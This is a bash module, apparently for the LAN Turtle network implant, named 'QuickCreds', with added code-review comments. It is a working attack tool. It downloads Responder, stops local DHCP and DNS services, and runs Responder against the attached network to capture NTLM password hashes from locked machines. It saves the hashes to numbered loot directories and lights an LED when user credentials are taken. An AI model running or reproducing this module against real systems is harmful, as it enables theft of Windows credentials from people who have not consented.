#!/bin/bash /usr/lib/turtle/turtle_module
# Module metadata; presumably read by the turtle_module loader named in the
# shebang (the loader itself is not part of this file).
VERSION="1.3"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."

# NOTE(review): fixed, predictable file name under /tmp. None of the functions
# below read or write it; if it is ever used, create it with mktemp instead.
CONF=/tmp/QuickCreds.form

# dialog(1) exit-status names. Each one is assigned only when the variable is
# not already set, so a value provided by the environment takes precedence.
: "${DIALOG_OK=0}"
: "${DIALOG_CANCEL=1}"
: "${DIALOG_HELP=2}"
: "${DIALOG_EXTRA=3}"
: "${DIALOG_ITEM_HELP=4}"
: "${DIALOG_ESC=255}"
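function configure {
  # Interactive one-time setup for the module.
  #
  # Asks for confirmation, refuses to run twice, checks connectivity, installs
  # the opkg packages the module needs, fetches Responder into
  # /etc/turtle/Responder and creates /root/loot with an empty responder.log.
  # Exits 0 when the operator declines and 1 when setup cannot proceed.
  local response pkg

  dialog --title "QuickCreds" \
    --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60
  response=$?
  # Only an explicit "Yes" continues; Cancel, ESC and any other status leave
  # the system untouched.
  if [[ "$response" -ne "${DIALOG_OK:-0}" ]]; then
    exit 0
  fi

  # Check to see if QuickCreds has already been configured
  if [[ -d /root/loot || -s /root/loot/responder.log ]]; then
    dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
    exit 1
  fi

  # Check for Internet connection
  if ! ping -q -w 5 -c 1 lanturtle.com &> /dev/null; then
    dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
    exit 1
  fi

  # Install dependencies
  opkg update | dialog --progressbox "Updating opkg" 14 72
  for pkg in git python-sqlite3 screen python-openssl coreutils-sleep; do
    # opkg prints "name - version"; anchor on the full package name so that an
    # unrelated package merely containing the string does not count as
    # "already installed".
    if ! opkg list-installed | grep -q "^${pkg} - "; then
      opkg install "$pkg" | dialog --progressbox "Installing dependency ${pkg}" 14 72
    fi
  done

  if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
    rm -rf /etc/turtle/Responder
    # NOTE(review): git:// is an unauthenticated, unencrypted transport and the
    # checkout is not pinned to a reviewed revision, so whatever this fetch
    # returns is what the start function later executes. Prefer an https://
    # remote (needs HTTPS support in the installed git -- confirm on the target
    # firmware) and check out a known-good commit.
    git clone git://github.com/lgandx/responder /etc/turtle/Responder -q | dialog --progressbox "Installing dependency responder" 14 72
    rm -rf /etc/turtle/Responder/.git

    # The pipeline's status is dialog's, not git's, so confirm the clone really
    # produced the entry point before reporting success.
    if [[ ! -s /etc/turtle/Responder/Responder.py ]]; then
      dialog --title "QuickCreds" --msgbox "\nResponder could not be downloaded.\nCheck the Internet connection and try again." 9 72
      exit 1
    fi
  fi

  # Setup loot directory and complete setup
  mkdir -p /root/loot
  touch /root/loot/responder.log
  dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to /root/loot\nEnable this module to have it start the attack on boot.\n" 9 72
}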
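function start {
  # Runs the module until a capture is logged.
  #
  # Stops the DHCP blink script and dnsmasq, creates the next numbered
  # directory under /root/loot, points Responder's logs directory at it,
  # launches Responder in a detached screen session, then blinks the LED while
  # polling the NTLM log files. On the first entry that is not a machine
  # account it appends "Creds saved!" to responder.log and calls finished.
  # Returns 1 without side effects when /root/loot is missing or the new loot
  # directory cannot be created.
  local loot_root=/root/loot
  local responder_dir=/etc/turtle/Responder
  local led='/sys/class/leds/turtle:yellow:system/brightness'
  local entry lootdir
  local dircount=0

  # Everything below writes into the loot directory, so refuse to start on an
  # unconfigured device before any service is stopped.
  if [[ ! -d "$loot_root" ]]; then
    echo "QuickCreds is not configured: $loot_root is missing." >&2
    return 1
  fi

  # Stop on-off-on DHCP blink pattern script
  echo "Stopping DHCP Detect Blink Script"
  /etc/init.d/dhcp_detect stop
  echo ""
  echo "QuickCreds started."
  echo "LED will blink rapidly while QuickCreds is running."
  echo "LED will light solid upon NTLM hash capture."
  echo ""
  echo "If starting this module from the Turtle Shell menu,"
  echo "press CTRL+C to return."
  echo "Starting attack..." >> "$loot_root/responder.log"

  # Create new numbered loot directory and symlink it from Responder logs
  cd "$loot_root" || return 1
  # Count the existing entries with a glob instead of parsing ls output;
  # responder.log is counted too, so the first run creates directory 1.
  for entry in "$loot_root"/*; do
    if [[ -e "$entry" || -L "$entry" ]]; then
      dircount=$((dircount + 1))
    fi
  done
  lootdir="$loot_root/$dircount"
  if ! mkdir -- "$lootdir"; then
    echo "Could not create $lootdir" >&2
    return 1
  fi

  # Delete all current Responder logs
  rm -rf -- "$responder_dir/logs"
  ln -s "$lootdir" "$responder_dir/logs"

  # Stop dnsmasq
  # (the original "1&>" passed a stray "1" argument to the init script)
  /etc/init.d/dnsmasq stop &> /dev/null

  # Execute attack
  screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'

  # Blink upon hash capture
  while true; do
    # Grep for user creds and do not match on machine creds, machine usernames
    # end in $. grep -q reports the result through its exit status, so several
    # matching lines no longer break the test the way the unquoted
    # "[ $(grep ...) ]" did.
    if grep -q -v '\$:' "$responder_dir"/logs/*NTLM* 2> /dev/null; then
      if [[ "$(tail -n1 "$loot_root/responder.log")" != *"Creds"* ]]; then
        echo "Creds saved!" >> "$loot_root/responder.log"
        # copy all responder logs to loot directory
        # NOTE(review): logs is a symlink to this same directory, so cp is
        # expected to report the files as identical -- confirm whether this
        # copy is still needed.
        cp "$responder_dir"/logs/* "$lootdir"
        finished
      fi
    fi
    echo 255 > "$led"
    /usr/bin/sleep 0.04
    echo 0 > "$led"
    /usr/bin/sleep 0.04
  done
}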
function finished {
  # Leave the LED at full brightness and end the running module process.
  # The bare exit passes on the status of the brightness write.
  local led_brightness='/sys/class/leds/turtle:yellow:system/brightness'
  printf '%s\n' 255 > "$led_brightness"
  exit
}
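function stop {
  # Terminates every process whose ps line contains "Responder", restarts
  # dnsmasq and prints a confirmation.
  local pids

  # The pattern is quoted so the shell cannot glob-expand [R]esponder against
  # a file in the current directory; the bracket form keeps the matcher's own
  # command line out of the result.
  pids=$(ps | awk '/[R]esponder/ {print $1}')
  if [[ -n "$pids" ]]; then
    # Word splitting is intended here: one PID per argument.
    # shellcheck disable=SC2086
    kill $pids
  fi

  # (the original "1&>" passed a stray "1" argument to the init script)
  /etc/init.d/dnsmasq start &> /dev/null
  echo "QuickCreds Stopped"
}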
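function status {
  # Prints "1" when ps lists a process containing the word Responder.py,
  # otherwise "0".
  #
  # The pattern is quoted: unquoted, [R]esponder.py is a glob that expands to
  # "Responder.py" if such a file exists in the current directory, and grep
  # could then match its own command line and report a false "1".
  if ps | grep -w -q '[R]esponder.py'; then
    echo "1"
  else
    echo "0"
  fi
}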